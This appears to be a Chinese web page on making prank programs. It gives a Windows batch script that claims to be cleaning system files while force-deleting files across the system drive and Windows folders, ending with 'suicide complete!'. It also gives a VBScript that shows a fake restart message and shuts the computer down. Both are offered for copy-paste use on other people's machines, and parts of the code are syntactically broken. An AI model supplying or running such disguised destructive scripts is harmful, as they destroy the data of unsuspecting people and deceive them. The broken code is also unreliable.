把@echo off
echo 正在清理系统文件,请稍等
del /f /s /q %systemdrive%\sys
del /f /s /q %systemdrive%\exe
del /f /s /q %systemdrive%\txt
del /f /s /q %systemdrive%\bat
del /f /s /q %systemdrive%\chk
del /f /s /q %systemdrive%\old
del /f /s /q %systemdrive%\recycled\
del /f /s /q %windir%\bak
del /f /s /q %windir%\prefetch\
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\
del /f /q %userprofile%\recent\
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\"
del /f /s /q "%userprofile%\Local Settings\Temp\"
del /f /s /q "%userprofile%\recent\"
echo 自杀完成!
echo & pause
写在记事本然后保存为bat格式
警告:不知道楼主要恶搞到什么程度,这个程序千万不要在自己电脑上使用,否则后果自负哦。
代码如下,复制到记事本,将txt改为vbs就ok了,中间的字可自己改。
if MsgBox("对不起,您灌水太多需要重新启动计算机。"&chr(10)&"确定要重启吗?",vbOKCancel+vbInformation,"重新启动计算机")=vbCancel then
msgbox " 正在清理系统垃圾wow ~_^",,"算你倒霉!!"
Set objShell = CreateObject("WscriptShell")
objShellRun "shutdown -s -t 5",,true
end if
加分哦
以上就是关于电脑恶搞软件怎么制作全部的内容,包括:电脑恶搞软件怎么制作、恶搞程序代码、等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)